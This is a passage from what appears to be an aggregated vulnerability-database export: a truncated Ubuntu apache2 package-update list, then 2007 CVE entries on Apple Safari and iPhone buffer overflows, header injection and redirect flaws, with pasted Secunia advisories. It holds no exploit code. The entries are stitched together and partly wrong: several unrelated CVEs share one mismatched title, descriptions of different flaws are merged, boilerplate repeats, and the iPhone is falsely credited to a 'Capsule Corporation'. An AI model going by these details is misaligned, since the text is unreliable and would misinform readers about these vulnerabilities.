    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu4.1_all.deb
      Size/MD5:  2124550 8d5c30342b35f9fd595fb09d7659b6fc
  amd64 architecture (Athlon64, Opteron, EM64T Xeon)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:   836342 2c4ba483b0b20fdc2d43819109177941
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:   227390 e61cc1998f5b8f2c44dce587e59d288a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:   222376 6bdbff7f7f80fd464d1e3ec52d6e7171
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:   226848 4356b4caf2b40f364c8893c41b9f9355
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:   171304 c4395af051e876228541ef5b8037d979
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:   172074 99dadc4ad0f0947f9368d89f4589d95a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:    94204 30f3bb8c72575fe93940ecc730b8e4b6
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:    36152 ea3cbefcbee7e2f6e5555edb44733ad9
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:   286544 d555931490d44d93bec31c4bfc19ed12
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.1_amd64.deb
      Size/MD5:   145014 3e06ceb0a55598d82f9f781c44e210b3
  i386 architecture (x86 compatible Intel/AMD)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:   806938 050bb7665332d3761e1a8e47939fa507
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:   209556 ee530b24aba8838001ebb6c901bc90cd
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:   205718 b52a17c63909eae3c49bad0ab1958f4b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:   209158 1844fa5e09224a90944f8b886ddb5a2a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:   171296 9de8aba41f7e3d60f41536ca712adebb
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:   172078 01ccd554177364747b08e2933f121d2c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:    93240 4573597317416869646eb2ea42cd0945
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:    36150 77666d65bade6a91bd58826c79f11dc9
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:   266390 a3963d8e76f6865404f7fadb47880c87
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.1_i386.deb
      Size/MD5:   137604 387f6bcdaa58dbbe53082241b3231844
  powerpc architecture (Apple Macintosh G3/G4/G5)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   865372 27d7f1de1fcb2114d3f3b0a774302488
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   221542 1ae8fa5cf4b77f3b2aa054e2886e587e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   217044 9134983c40107f79fcac8d1eacbc7117
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   221324 b435dc09c63ecbcd564a0923a8f07350
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   171296 6d2a0abfb7a1daaeae56559eeb322dcb
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   172064 ecc2037409554ea43c5a6848aa510c76
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   104654 d0957d8df044c4a34437241792ed97d1
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:    36148 34e102e1d2e1c6a6f31801dfb98cb82a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   284548 c8f325ccc42cbe77191d4ddd9abc2a4e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.1_powerpc.deb
      Size/MD5:   144238 82cfbfcec5fc4931078145af8947c035
  sparc architecture (Sun SPARC/UltraSPARC)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:   811594 d8548e537fd81994bbb638e105dfbf8b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:   212160 81cd0197ff89b79c967c1074ede9f8d7
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:   207870 5d80ed8dc39b0d4d59fccb747624a684
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:   211578 9407383d85db831dab728b39cce9acc8
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:   171294 5e4d695a99bdc1fdfb0bfcef8b91d03d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:   172064 06e3e765d799e281dba7329ff9d9e138
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:    93796 1048b47b289fb2047fa9ac7ebbe94a57
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:    36150 0d106a177aa4271b1cfc0e96eec1a748
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:   268444 3912123e7c71cc638132305ca89fe23b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.1_sparc.deb
      Size/MD5:   130626 f4444e0239c2da7d3c31e3486606f95a
Updated packages for Ubuntu 7.04:
  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3-3.2ubuntu0.1.diff.gz
      Size/MD5:   112120 f7b1a17718aed7ca73da3a6d7aad06b0
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3-3.2ubuntu0.1.dsc
      Size/MD5:     1128 e82b1bee591fff50d6673ed1a443e543
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3.orig.tar.gz
      Size/MD5:  6342475 f72ffb176e2dc7b322be16508c09f63c
  Architecture independent packages:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.2.3-3.2ubuntu0.1_all.deb
      Size/MD5:  2199184 c03756f87cb164213428532f70e0c198
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.2.3-3.2ubuntu0.1_all.deb
      Size/MD5:   272064 5be351f491f8d1aae9a270d1214e93e3
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-src_2.2.3-3.2ubuntu0.1_all.deb
      Size/MD5:  6674104 bdbabf8f478562f0e003737e977ffc7b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3-3.2ubuntu0.1_all.deb
      Size/MD5:    38668 9f0c7c01e8441285c084002eb4619065
  amd64 architecture (Athlon64, Opteron, EM64T Xeon)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu0.1_amd64.deb
      Size/MD5:   449624 1b54a8000c40eaaa0f9e31527b9bb180
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu0.1_amd64.deb
      Size/MD5:   445346 d15625641a3247fbf5d9d9b9aed34968
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu0.1_amd64.deb
      Size/MD5:   449208 55f39c28a4de98d53f80231aeb7d6c59
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu0.1_amd64.deb
      Size/MD5:   403570 0042c75be8a2d128d62b79398deaefa8
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu0.1_amd64.deb
      Size/MD5:   404138 929772b95ea67f338ad423a65b2b7011
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu0.1_amd64.deb
      Size/MD5:   341312 906819b0de863209575aa65d39a594a5
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu0.1_amd64.deb
      Size/MD5:   971462 f85e32c5f6437ce149553aee97ffd934
  i386 architecture (x86 compatible Intel/AMD)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu0.1_i386.deb
      Size/MD5:   432922 c1b81ac7dc7b7a0b2261fd10d9bcf5c6
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu0.1_i386.deb
      Size/MD5:   428856 f506f2a9dd2dbd5c2d3f72a476cc3537
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu0.1_i386.deb
      Size/MD5:   432314 a5a11947ad8cf14604efa7ddcfd20bfe
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu0.1_i386.deb
      Size/MD5:   403574 da84a3a99276f14a11ac892ce7eee170
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu0.1_i386.deb
      Size/MD5:   404138 0fdd43a53e6957aa3a348a7bd9c876f5
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu0.1_i386.deb
      Size/MD5:   340396 88a0ddbc58335416d91c9f10adc9d5f5
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu0.1_i386.deb
      Size/MD5:   929716 138d58487b882e6002e3c5e4a9489add
  powerpc architecture (Apple Macintosh G3/G4/G5)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu0.1_powerpc.deb
      Size/MD5:   451530 ddc437092ef642fcd396713cd1972f4c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu0.1_powerpc.deb
      Size/MD5:   446960 af1b667708e062f81bca4e995355394d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu0.1_powerpc.deb
      Size/MD5:   450940 ed9f31ec5045a88446115987c6e97655
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu0.1_powerpc.deb
      Size/MD5:   403574 65801ab51335a15dc370b9341a0e50dd
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu0.1_powerpc.deb
      Size/MD5:   404146 fd35e65fadd836feb0190b209947b466
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu0.1_powerpc.deb
      Size/MD5:   360518 b74bc9eead429cd8f0ebecd6a94e5edb
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu0.1_powerpc.deb
      Size/MD5:  1073812 376fe5b1ee383a6d870eea5dd3c6a704
  sparc architecture (Sun SPARC/UltraSPARC)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu0.1_sparc.deb
      Size/MD5:   434408 c70ef2e9aed191fe53886ceb3725596e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu0.1_sparc.deb
      Size/MD5:   430574 7b690896da23a151ee5e106d596c1143
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu0.1_sparc.deb
      Size/MD5:   433918 cc01edfcfc673ba9a86c83fcc66e6870
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu0.1_sparc.deb
      Size/MD5:   403568 a7660cff70394403c764cf8f30c7298a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu0.1_sparc.deb
      Size/MD5:   404136 b8587d5eba0be59a6576d6cf645b2122
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu0.1_sparc.deb
      Size/MD5:   343370 1572a001a612add57d23350210ac1736
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu0.1_sparc.deb
      Size/MD5:   938586 b74a91fcfbb0503355e94981310bd1ce
                        
| VAR-200709-0211 | CVE-2007-4812 | Apple Safari for Windows Document.Location.Hash Buffer Overflow Vulnerability | CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM | 
                            Buffer overflow in Apple Safari 3.0.3 522.15.5, and other versions before Beta Update 3.0.4, allows remote attackers to cause a denial of service (crash) and possibly have other unspecified impact by setting document.location.hash to a long string.  NOTE: the crash might actually occur in the alert method. Apple Safari In document.location.hash Contains a flaw in string handling that could lead to a buffer overflow.Created by a third party Web Browsing the browser by browsing the page causes service disruption (DoS) Could be put into a state or execute arbitrary code. Safari for Windows is prone to a buffer overflow that occurs when an attacker entices a victim to view a maliciously crafted webpage. 
A remote attacker may exploit this issue to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions
                        
| VAR-200706-0568 | CVE-2007-3376 | Apple Safari Vulnerable to buffer overflow | CVSS V2: 9.3 CVSS V3: - Severity: HIGH | 
                            Buffer overflow in Apple Safari 3.0.2 on Windows XP SP2 allows user-assisted remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long value in the title HTML tag, which triggers the overflow when the user adds the page as a bookmark. Safari for Windows is prone to a buffer-overflow vulnerability. This issue is triggered when an attacker entices a victim to bookmark a maliciously crafted site. 
A remote attacker may exploit this issue to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. Overflow is triggered when a user adds a web page to favorites
                        
| VAR-200708-0454 | CVE-2007-3743 | Apple Safari Vulnerable to stack-based buffer overflow in bookmark processing | CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM | 
                            Stack-based buffer overflow in bookmark handling in Apple Safari 3 Beta before Update 3.0.3 on Windows allows user-assisted remote attackers to cause a denial of service (application crash) or execute arbitrary code via a bookmark with a long title. Safari for Windows is prone to a buffer-overflow vulnerability. This issue is triggered when an attacker entices a victim to bookmark a maliciously crafted site. 
A remote attacker may exploit this issue to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. Safari is the WEB browser bundled with the Apple family operating system by default. When Safari 3 Beta for Windows is upgraded to version 3.0.3, there is a buffer overflow vulnerability when dealing with super long titles in web pages. Remote attackers may take advantage of this vulnerability to control the user's machine. Safari on Windows does not properly handle title fields in web pages. If the length of this field is greater than 1024 bytes, a buffer overflow will be triggered when the user visits the page and performs the bookmark operation, resulting in the execution of arbitrary instructions in the browser session
                        
| VAR-200708-0453 | CVE-2007-3742 | Apple Safari cross-domain HTTP redirection race condition | CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM | 
                            WebKit in Apple Safari 3 Beta before Update 3.0.3, and iPhone before 1.0.1, does not properly handle the interaction between International Domain Name (IDN) support and Unicode fonts, which allows remote attackers to create a URL containing "look-alike characters" (homographs) and possibly perform phishing attacks. Apple Safari contains a race condition when handling HTTP redirection when updating pages.  This can allow a cross-domain violation. Apple WebCore fails to properly serialize headers into an HTTP request, which can cause a cross-domain security violation. The Apple Webkit contains a memory corruption vulnerability.This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code. Apple's Safari contains a vulnerability that allows spoofing of URLs in the address bar. Apple's Safari is a web browser installed as default with Mac OS X. There is a problem in Safari where URLs displayed in the address bar could be spoofed to deceive Safari users. This could be conducted by using Unicode characters that look alike to ASCII characters as URL strings.As it is difficult for Safari users to tell whether the displayed URL is spoofed or not, an attacker could possibly conduct phising attacks. 
Attackers may exploit this vulnerability via a malicious webpage to spoof the contents and origin of a page that the victim may trust. Attackers may find this issue useful in phishing or other attacks that rely on content spoofing. 
This issue affects Apple Safari 3.0.2 for Windows; other versions may also be affected. 
The iPhone is reported to be affected in the APPLE-SA-2007-07-31 iPhone v1.0.1 Update security advisory. 
----------------------------------------------------------------------
BETA test the new Secunia Personal Software Inspector!
The Secunia PSI detects installed software on your computer and
categorises it as either Insecure, End-of-Life, or Up-To-Date. 
Effectively enabling you to focus your attention on software
installations where more secure versions are available from the
vendors. 
Download the free PSI BETA from the Secunia website:
https://psi.secunia.com/
----------------------------------------------------------------------
TITLE:
Apple iPhone Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26287
VERIFY ADVISORY:
http://secunia.com/advisories/26287/
CRITICAL:
Highly critical
IMPACT:
Cross Site Scripting, Spoofing, DoS, System access
WHERE:
>From remote
OPERATING SYSTEM:
Apple iPhone 1.x
http://secunia.com/product/15128/
DESCRIPTION:
Some vulnerabilities have been reported in Apple iPhone, which can be
exploited by malicious people to conduct cross-site scripting and
spoofing attacks, and potentially to compromise a vulnerable system. 
2) A boundary error in the Perl Compatible Regular Expressions (PCRE)
library used by the Javascript engine in Safari can be exploited to
cause a heap-based buffer overflow when a user visits a malicious web
page. 
Successful exploitation may allow execution of arbitrary code. 
3) An HTTP injection issue in XMLHttpRequest can be exploited to
inject arbitrary HTTP requests. 
5) An invalid type conversion when rendering frame sets may allow
execution of arbitrary code. 
For more information see vulnerability #1 in:
SA25786
SOLUTION:
Update to version 1.0.1 (downloadable and installable via iTunes). 
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Lawrence Lai, Stan Switzer, and Ed Rowe of
Adobe Systems, Inc. 
2) The vendor credits Charlie Miller and Jake Honoroff of Independent
Security Evaluators. 
3) The vendor credits Richard Moore, Westpoint Ltd. 
5) The vendor credits Rhys Kidd, Westnet. 
ORIGINAL ADVISORY:
http://docs.info.apple.com/article.html?artnum=306173
OTHER REFERENCES:
SA25786:
http://secunia.com/advisories/25786/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities. 
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link. 
Secunia NEVER sends attached files with advisories. 
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. 
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
                        
| VAR-200707-0129 | CVE-2007-3944 | Apple Safari cross-domain HTTP redirection race condition | CVSS V2: 9.3 CVSS V3: - Severity: HIGH | 
                            Multiple heap-based buffer overflows in the Perl Compatible Regular Expressions (PCRE) library in the JavaScript engine in WebKit in Apple Safari 3 Beta before Update 3.0.3, and iPhone before 1.0.1, allow remote attackers to execute arbitrary code via certain JavaScript regular expressions. NOTE: this issue was originally reported only for MobileSafari on the iPhone.  NOTE: it is not clear whether this stems from an issue in the original distribution of PCRE, which might already have a separate CVE identifier. Apple Safari contains a race condition when handling HTTP redirection when updating pages.  This can allow a cross-domain violation. Apple WebCore fails to properly serialize headers into an HTTP request, which can cause a cross-domain security violation. The Apple Webkit contains a memory corruption vulnerability.This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code. 
The researchers responsible for discovering this issue have developed exploit code that can steal sensitive information from a vulnerable device and send it to a remote server.  Another proof of concept that exploits the same issue can be used to perform physical actions on the phone such as making a sound or setting the phone to vibrate.  The researchers have not yet disclosed the complete details of this vulnerability but will do so as part of a presentation for the BlackHat security conference on August 2, 2007. 
This issue also affects Safari on other platforms including Windows and Mac OS X. The iPhone is a smartphone developed by Capsule Corporation. There are multiple security holes in the implementation of the iPhone, which can lead to malicious operation of the browser or information leakage. Remote attackers may use this vulnerability to control the user system by enticing users to visit malicious web pages. 
----------------------------------------------------------------------
BETA test the new Secunia Personal Software Inspector!
The Secunia PSI detects installed software on your computer and
categorises it as either Insecure, End-of-Life, or Up-To-Date. 
Effectively enabling you to focus your attention on software
installations where more secure versions are available from the
vendors. 
Download the free PSI BETA from the Secunia website:
https://psi.secunia.com/
----------------------------------------------------------------------
TITLE:
Apple iPhone Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26287
VERIFY ADVISORY:
http://secunia.com/advisories/26287/
CRITICAL:
Highly critical
IMPACT:
Cross Site Scripting, Spoofing, DoS, System access
WHERE:
>From remote
OPERATING SYSTEM:
Apple iPhone 1.x
http://secunia.com/product/15128/
DESCRIPTION:
Some vulnerabilities have been reported in Apple iPhone, which can be
exploited by malicious people to conduct cross-site scripting and
spoofing attacks, and potentially to compromise a vulnerable system. 
Successful exploitation may allow execution of arbitrary code. 
3) An HTTP injection issue in XMLHttpRequest can be exploited to
inject arbitrary HTTP requests. 
For more information see vulnerability #2 in:
SA25786
4) An error in WebKit within in the handling of International Domain
Name (IDN) support and Unicode fonts embedded in Safari can be
exploited to spoof a URL by registering domain names with certain
international characters that resembles other commonly used
characters. 
5) An invalid type conversion when rendering frame sets may allow
execution of arbitrary code. 
For more information see vulnerability #1 in:
SA25786
SOLUTION:
Update to version 1.0.1 (downloadable and installable via iTunes). 
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Lawrence Lai, Stan Switzer, and Ed Rowe of
Adobe Systems, Inc. 
2) The vendor credits Charlie Miller and Jake Honoroff of Independent
Security Evaluators. 
3) The vendor credits Richard Moore, Westpoint Ltd. 
5) The vendor credits Rhys Kidd, Westnet. 
ORIGINAL ADVISORY:
http://docs.info.apple.com/article.html?artnum=306173
OTHER REFERENCES:
SA25786:
http://secunia.com/advisories/25786/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities. 
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link. 
Secunia NEVER sends attached files with advisories. 
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. 
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
                        
| VAR-200706-0349 | CVE-2007-2401 | Apple Safari cross-domain HTTP redirection race condition | CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM | 
                            CRLF injection vulnerability in WebCore in Apple Mac OS X 10.3.9, 10.4.9 and later, and iPhone before 1.0.1, allows remote attackers to inject arbitrary HTTP headers via LF characters in an XMLHttpRequest request, which are not filtered when serializing headers via the setRequestHeader function.  NOTE: this issue can be leveraged for cross-site scripting (XSS) attacks. Apple Safari contains a race condition when handling HTTP redirection when updating pages.  This can allow a cross-domain violation. Apple WebCore fails to properly serialize headers into an HTTP request, which can cause a cross-domain security violation. The Apple Webkit contains a memory corruption vulnerability.This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code. Apple WebCore is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. 
An attacker may exploit this issue by enticing victims into visiting a malicious website. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The iPhone is a smartphone developed by Capsule Corporation. There are multiple security holes in the implementation of the iPhone, which can lead to malicious operation of the browser or information leakage. The specific vulnerability entries are as follows: * CVE-2007-2401 XMLHttpRequest of the WebCore software package has a vulnerability in processing HTTP request headers, resulting in cross-site scripting. 
----------------------------------------------------------------------
BETA test the new Secunia Personal Software Inspector!
The Secunia PSI detects installed software on your computer and
categorises it as either Insecure, End-of-Life, or Up-To-Date. 
Effectively enabling you to focus your attention on software
installations where more secure versions are available from the
vendors. 
Download the free PSI BETA from the Secunia website:
https://psi.secunia.com/
----------------------------------------------------------------------
TITLE:
Apple iPhone Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26287
VERIFY ADVISORY:
http://secunia.com/advisories/26287/
CRITICAL:
Highly critical
IMPACT:
Cross Site Scripting, Spoofing, DoS, System access
WHERE:
>From remote
OPERATING SYSTEM:
Apple iPhone 1.x
http://secunia.com/product/15128/
DESCRIPTION:
Some vulnerabilities have been reported in Apple iPhone, which can be
exploited by malicious people to conduct cross-site scripting and
spoofing attacks, and potentially to compromise a vulnerable system. 
2) A boundary error in the Perl Compatible Regular Expressions (PCRE)
library used by the Javascript engine in Safari can be exploited to
cause a heap-based buffer overflow when a user visits a malicious web
page. 
Successful exploitation may allow execution of arbitrary code. 
3) An HTTP injection issue in XMLHttpRequest can be exploited to
inject arbitrary HTTP requests. 
For more information see vulnerability #2 in:
SA25786
4) An error in WebKit within in the handling of International Domain
Name (IDN) support and Unicode fonts embedded in Safari can be
exploited to spoof a URL by registering domain names with certain
international characters that resembles other commonly used
characters. 
5) An invalid type conversion when rendering frame sets may allow
execution of arbitrary code. 
For more information see vulnerability #1 in:
SA25786
SOLUTION:
Update to version 1.0.1 (downloadable and installable via iTunes). 
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Lawrence Lai, Stan Switzer, and Ed Rowe of
Adobe Systems, Inc. 
2) The vendor credits Charlie Miller and Jake Honoroff of Independent
Security Evaluators. 
3) The vendor credits Richard Moore, Westpoint Ltd. 
5) The vendor credits Rhys Kidd, Westnet. 
ORIGINAL ADVISORY:
http://docs.info.apple.com/article.html?artnum=306173
OTHER REFERENCES:
SA25786:
http://secunia.com/advisories/25786/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities. 
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link. 
Secunia NEVER sends attached files with advisories. 
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. 
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
                        
| VAR-200706-0348 | CVE-2007-2400 | Apple Safari cross-domain HTTP redirection race condition | CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM | 
                            Race condition in Apple Safari 3 Beta before 3.0.2 on Mac OS X, Windows XP, Windows Vista, and iPhone before 1.0.1, allows remote attackers to bypass the JavaScript security model and modify pages outside of the security domain and conduct cross-site scripting (XSS) attacks via vectors related to page updating and HTTP redirects. Apple Safari contains a race condition when handling HTTP redirection when updating pages.  This can allow a cross-domain violation. Apple WebCore fails to properly serialize headers into an HTTP request, which can cause a cross-domain security violation. The Apple Webkit contains a memory corruption vulnerability.This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code. 
Exploiting this issue may allow attackers to access locations that a user visits, even if those locations are in a different domain than the attacker's site. The most common manifestation of this condition would typically be in blogs or forums. Attackers may be able to access potentially sensitive information that would aid in phishing attacks. 
